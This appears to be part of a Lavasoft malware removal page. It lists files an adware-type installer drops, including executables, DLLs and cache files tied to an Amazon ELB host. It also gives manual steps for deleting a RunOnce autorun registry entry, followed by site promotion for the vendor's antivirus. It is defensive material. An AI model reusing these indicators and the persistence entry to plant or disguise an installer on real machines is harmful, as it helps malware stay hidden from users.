    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@histats[1].txt (201 bytes)
    %Documents and Settings%\%current user%\Application Data\InstallW\Resume.exe (3073 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nse3.tmp\WmiInspector.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj4.tmp (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\0[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\CAQ1ETAB.htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb13.tmp (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\01YZ8DO3\r[2].htm (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Uninstall.exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\KrMubhB0c[1] (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb14.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf10.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsh16.tmp (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\vos_n[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\Validate[1].exe (4152 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa21.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsaF.tmp (11755 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\10SAOYKV\zEuCD[1] (36408 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg12.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf11.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsa22.tmp (5952 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst19.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl23.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\QVGR0V8V\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (30 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y76DQBOB\ibf-cmi-1938953175.us-east-1.elb.amazonaws[1] (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsi9.tmp\inetc.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseC.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd7.tmp (6720 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nseB.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nskD.tmp (15 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsoA.tmp (7192 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "Finalize" = "%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now